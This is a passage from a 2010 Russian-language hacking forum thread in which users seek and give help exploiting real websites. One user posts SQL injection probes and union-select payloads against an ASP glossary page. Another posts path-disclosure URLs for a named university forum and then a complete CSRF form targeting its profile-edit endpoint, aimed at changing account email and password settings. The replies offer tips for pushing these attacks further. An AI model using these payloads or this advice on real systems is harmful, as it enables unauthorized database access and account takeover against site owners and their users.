Старый 22.11.2010, 23:52   #591
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Цитата:
Сообщение от anvaruser Посмотреть сообщение
Делаю запрос, число полей подобрал
Выводит ошибку:
Похоже, что там более одного запроса с одним и тем же аргументом.
Попробуй покрутить как слепую с выводом в ошибке, примеры есть в статьях.
tipsy вне форума   Ответить с цитированием
Старый 23.11.2010, 15:34   #592
Seravin
 
Регистрация: 06.07.2010
Сообщений: 13
Репутация: 2
По умолчанию

интересно то, что в ошибке то выводит весь запрос, начиная с union. Как вариант я подумал, что ордер, но такой ошибки получить на локалке не удалось + ко всему связать не придумал как order с id.

а насчёт нескольких запросов, то опять же вопрос: как получить такую ошибку. то что скобок там нет 100%, т.к. в конце запроса лимит выводит
Seravin вне форума   Ответить с цитированием
Старый 27.11.2010, 15:55   #593
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

_http://***.com/training/wbt/getGlossary.asp?ID=1+and+1=1 --true
_http://***.com/training/wbt/getGlossary.asp?ID=1+and+1=@@version -- Syntax error (missing operator) in query expression 'Term_ID=1 and 1=@@version'.

_http://***.com/training/wbt/getGlossary.asp?ID=1+order+by+10 -- true
_http://***.com/training/wbt/getGlossary.asp?ID=1+union+select+1,2,3,4,5,6,7,8, 9,10 --Query input must contain at least one table or query.

что делать? как вывести версию, как раскрутить скуль?

Последний раз редактировалось Twost; 16.05.2013 в 09:12..
525 вне форума   Ответить с цитированием
Старый 27.11.2010, 16:07   #594
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

525
А зачем тебе версия? Это ведь акцес.
тудум
SynQ вне форума   Ответить с цитированием
Старый 27.11.2010, 16:24   #595
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
525
А зачем тебе версия? Это ведь акцес.
тудум
ага , ступив трохи)
_http://***.com/training/wbt/getGlossary.asp?ID=1+union+select+Id,Id,Id,Id,Id,I d,Id,Id,Id,Id+from+MSysAccessXML (-1,+and+1=0,9999999 --- error '80020009' /training/wbt/getGlossary.asp, line 8 ) Blind ?

Последний раз редактировалось Twost; 16.05.2013 в 09:12..
525 вне форума   Ответить с цитированием
Старый 27.11.2010, 16:52   #596
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
Question

Вопрос:

Код:
http://forum.kai.ru/posting.php?mode[]=
http://forum.kai.ru/modcp.php?mode[]=
http://forum.kai.ru/groupcp.php?mode[]=
http://forum.kai.ru/memberlist.php?mode[]=

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /usr/local/www/vhost/forum.kai.ru/htdocs/groupcp.php on line 140
Это простая ошибка или что?
_xhugo вне форума   Ответить с цитированием
Старый 27.11.2010, 18:09   #597
Redwood
 
Аватар для Redwood
 
Регистрация: 06.07.2010
Сообщений: 5
Репутация: 1
По умолчанию

Цитата:
Сообщение от _xhugo Посмотреть сообщение
Вопрос:

Код:
http://forum.***.ru/posting.php?mode[]=
http://forum.***.ru/modcp.php?mode[]=
http://forum.***.ru/groupcp.php?mode[]=
http://forum.***.ru/memberlist.php?mode[]=

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /usr/local/www/vhost/forum.***.ru/htdocs/groupcp.php on line 140
Это простая ошибка или что?
Это раскрытие путей из за недостаточной проверки типа входящих данных.

Последний раз редактировалось Twost; 16.05.2013 в 09:14..
Redwood вне форума   Ответить с цитированием
Старый 27.11.2010, 18:21   #598
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

Дает ли это там какие либо возможности?
_xhugo вне форума   Ответить с цитированием
Старый 27.11.2010, 22:07   #599
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

Хотел сделать XSRF forum.***.ru/profile.php?mode=editprofile

Код:
<form action="http://forum.***.ru/profile.php" enctype="multipart/form-data" method="post" id="f1">



  <table width="98%" cellspacing="2" cellpadding="2" border="0" align="center">
    <tr>

      <td align="left" height="40"><span class="nav"><a href="http://forum.***.ru/index.php" class="nav">Список
        форумов</a></span></td>
	</tr>
</table>

  <table border="0" cellpadding="3" cellspacing="1" width="98%" class="forumline" align="center">
    <tr>
		<th class="thHead" colspan="2" height="25" valign="middle">Регистрационная информация</th>
	</tr>
	<tr>
		<td class="row2" colspan="2"><span class="gensmall">Поля отмеченные * обязательны к заполнению, если не указано обратное</span></td>
	</tr>
	<tr>
		<td class="row1" width="38%"><span class="gen">Имя: *</span></td>
		<td class="row2"><input type="text" class="post" style="width:200px" name="username" size="25" maxlength="40" value="xhugo" /></td>
	</tr>
	<tr>
		<td class="row1"><span class="gen">Адрес e-mail: *</span></td>
		<td class="row2"><input type="text" class="post" style="width:200px" name="email" size="25" maxlength="255" value="hugolom4@rambler.ru" /></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Текущий пароль: *</span><br />
		<span class="gensmall">Вы должны указать ваш текущий пароль, если хотите изменить его или поменять свой адрес e-mail.</span></td>
	  <td class="row2">
		<input type="password" class="post" style="width: 200px" name="cur_password" size="25" maxlength="100" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Новый пароль: *</span><br />
		<span class="gensmall">Указывайте пароль только если вы хотите его поменять</span></td>
	  <td class="row2">
		<input type="password" class="post" style="width: 200px" name="new_password" size="25" maxlength="100" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Подтвердите пароль: * </span><br />
		<span class="gensmall">Подтверждать пароль нужно в том случае, если вы изменили его выше.</span></td>
	  <td class="row2">
		<input type="password" class="post" style="width: 200px" name="password_confirm" size="25" maxlength="100" value="" />
	  </td>
	</tr>
	<!-- Visual Confirmation -->

	<tr>
	  <td class="catSides" colspan="2" height="28">&nbsp;</td>
	</tr>
	<tr>
	  <th class="thSides" colspan="2" height="25" valign="middle">Профиль</th>
	</tr>
	<tr>
	  <td class="row2" colspan="2"><span class="gensmall">Эта информация будет в открытом доступе</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">ICQ Number:</span></td>
	  <td class="row2">
		<input type="text" name="icq" class="post"style="width: 100px"  size="10" maxlength="15" value="59793002" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">AIM Address:</span></td>
	  <td class="row2">
		<input type="text" class="post"style="width: 150px"  name="aim" size="20" maxlength="255" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">MSN Messenger:</span></td>
	  <td class="row2">
		<input type="text" class="post"style="width: 150px"  name="msn" size="20" maxlength="255" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Yahoo Messenger:</span></td>
	  <td class="row2">
		<input type="text" class="post"style="width: 150px"  name="yim" size="20" maxlength="255" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Сайт:</span></td>
	  <td class="row2">
		<input type="text" class="post"style="width: 200px"  name="website" size="25" maxlength="255" value="http://xhugo.name" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Откуда:</span></td>
	  <td class="row2">
		<input type="text" class="post"style="width: 200px"  name="location" size="25" maxlength="100" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Род занятий:</span></td>
	  <td class="row2">
		<input type="text" class="post"style="width: 200px"  name="occupation" size="25" maxlength="100" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Интересы:</span></td>
	  <td class="row2">
		<input type="text" class="post"style="width: 200px"  name="interests" size="35" maxlength="150" value="" />
	  </td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Подпись:</span><br /><span class="gensmall">Это текст, который можно добавлять к размещаемым вами сообщениям. Длина его ограничена 64 символами.<br /><br />HTML <u>ВЫКЛЮЧЕН</u><br /><a href="http://forum.kai.ru/faq.php?mode=bbcode" target="_phpbbcode">BBCode</a> <u>ВКЛЮЧЕН</u><br />Смайлики <u>ВКЛЮЧЕНЫ</u></span></td>
	  <td class="row2">
		<textarea name="signature"style="width: 300px"  rows="6" cols="30" class="post"></textarea>
	  </td>
	</tr>
	<tr>
	  <td class="catSides" colspan="2" height="28">&nbsp;</td>
	</tr>
	<tr>
	  <th class="thSides" colspan="2" height="25" valign="middle">Личные настройки</th>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Всегда показывать мой адрес e-mail:</span></td>
	  <td class="row2">
		<input type="radio" name="viewemail" value="1"  />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="viewemail" value="0" checked="checked" />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Скрывать ваше пребывание на форуме:</span></td>
	  <td class="row2">
		<input type="radio" name="hideonline" value="1"  />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="hideonline" value="0" checked="checked" />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Всегда сообщать мне об ответах:</span><br />
		<span class="gensmall">Когда кто-нибудь ответит на тему, в которую вы писали, вам высылается e-mail. Это можно также настроить при размещении сообщения.</span></td>
	  <td class="row2">
		<input type="radio" name="notifyreply" value="1"  />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="notifyreply" value="0" checked="checked" />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Уведомлять о новых личных сообщениях:</span></td>
	  <td class="row2">
		<input type="radio" name="notifypm" value="1" checked="checked" />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="notifypm" value="0"  />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Открывать новое окно при новом личном сообщении:</span><br /><span class="gensmall">В некоторых шаблонах может открываться новое окно браузера с уведомлением о приходе нового личного сообщения.</span></td>
	  <td class="row2">
		<input type="radio" name="popup_pm" value="1" checked="checked" />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="popup_pm" value="0"  />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Всегда присоединять мою подпись:</span></td>
	  <td class="row2">
		<input type="radio" name="attachsig" value="1" checked="checked" />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="attachsig" value="0"  />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">BBCode всегда включён:</span></td>
	  <td class="row2">
		<input type="radio" name="allowbbcode" value="1" checked="checked" />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="allowbbcode" value="0"  />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">HTML всегда включён:</span></td>
	  <td class="row2">
		<input type="radio" name="allowhtml" value="1"  />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="allowhtml" value="0" checked="checked" />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Смайлики всегда включены:</span></td>
	  <td class="row2">
		<input type="radio" name="allowsmilies" value="1" checked="checked" />
		<span class="gen">Да</span>&nbsp;&nbsp;
		<input type="radio" name="allowsmilies" value="0"  />
		<span class="gen">Нет</span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Язык:</span></td>
	  <td class="row2"><span class="gensmall"><select name="language"><option value="english">English</option><option value="russian" selected="selected">Russian</option></select></span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Внешний вид форумов:</span></td>
	  <td class="row2"><span class="gensmall"><select name="style"><option value="3" selected="selected">DesertStorm</option><option value="1">subSilver</option></select></span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Часовой пояс:</span></td>
	  <td class="row2"><span class="gensmall"><select name="timezone"><option value="-12">GMT - 12</option><option value="-11">GMT - 11</option><option value="-10">GMT - 10</option><option value="-9">GMT - 9</option><option value="-8">GMT - 8</option><option value="-7">GMT - 7</option><option value="-6">GMT - 6</option><option value="-5">GMT - 5</option><option value="-4">GMT - 4</option><option value="-3.5">GMT - 3:30</option><option value="-3">GMT - 3</option><option value="-2">GMT - 2</option><option value="-1">GMT - 1</option><option value="0">GMT (время по Гринвичу)</option><option value="1">GMT + 1</option><option value="2">GMT + 2</option><option value="3" selected="selected">GMT + 3 (московское время)</option><option value="3.5">GMT + 3:30</option><option value="4">GMT + 4 (летнее московское время)</option><option value="4.5">GMT + 4:30</option><option value="5">GMT + 5</option><option value="5.5">GMT + 5:30</option><option value="6">GMT + 6</option><option value="6.5">GMT + 6:30</option><option value="7">GMT + 7</option><option value="8">GMT + 8</option><option value="9">GMT + 9</option><option value="9.5">GMT + 9:30</option><option value="10">GMT + 10</option><option value="11">GMT + 11</option><option value="12">GMT + 12</option><option value="13">GMT + 13</option></select></span></td>
	</tr>
	<tr>
	  <td class="row1"><span class="gen">Формат даты:</span><br />
		<span class="gensmall">Синтаксис идентичен функции <a href="http://www.php.net/date" target="_other">date()</a> языка PHP</span></td>
	  <td class="row2">
		<input type="text" name="dateformat" value="d.m.Y, H:i:s" maxlength="14" class="post" />
	  </td>
	</tr>
	<tr>
	  <td class="catSides" colspan="2" height="28">&nbsp;</td>
	</tr>
	<tr>
	  <th class="thSides" colspan="2" height="12" valign="middle">Управление аватарой</th>
	</tr>
	<tr>
		<td class="row1" colspan="2"><table width="70%" cellspacing="2" cellpadding="0" border="0" align="center">
			<tr>
				<td width="65%"><span class="gensmall">Показывает небольшое изображение под информацией о вас в сообщениях. Может быть показано только одно изображение, шириной не более 80 пикселов, высотой не более 80 пикселов и объёмом не более 6 кб.</span></td>
				<td align="center"><span class="gensmall">Текущее изображение</span><br /><br /><input type="checkbox" name="avatardel" />&nbsp;<span class="gensmall">Удалить изображение</span></td>
			</tr>
		</table></td>
	</tr>

<tr>
	</tr>
	<tr>

	</tr>
	<tr>

	</tr>
	<tr>
		<td class="catBottom" colspan="2" align="center" height="28"><input type="hidden" name="mode" value="editprofile" /><input type="hidden" name="agreed" value="true" /><input type="hidden" name="coppa" value="0" /><input type="hidden" name="user_id" value="80546" /><input type="hidden" name="current_email" value="omgbob@rambler.ru" /><input type="submit" name="submit" value="Отправить" class="mainoption" />&nbsp;&nbsp;<input type="reset" value="Вернуть" name="reset" class="liteoption" /></td>
	</tr>
</table>

  <br>
</form>


</body>
</html>
Пытаюсь запустить, но не хочет даже перенаправлять на оригинал, в чем проблема?

Последний раз редактировалось Twost; 16.05.2013 в 09:14..
_xhugo вне форума   Ответить с цитированием
Старый 28.11.2010, 13:35   #600
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

немного изменил кнопку
Цитата:
<input type="submit" accesskey="s" tabindex="6" name="post" class="mainoption" value="Отправить" />
переход был, но значения не передались, будто ничего и не было.

Что ни так?
_xhugo вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot